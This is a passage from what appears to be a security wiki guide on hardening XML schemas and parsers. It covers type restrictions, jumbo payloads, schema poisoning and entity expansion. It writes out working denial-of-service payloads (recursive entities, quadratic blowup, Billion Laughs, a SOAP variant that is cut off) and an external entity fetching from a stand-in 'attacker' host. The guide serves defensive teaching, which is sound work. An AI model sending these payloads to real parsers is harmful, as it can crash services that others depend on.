        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
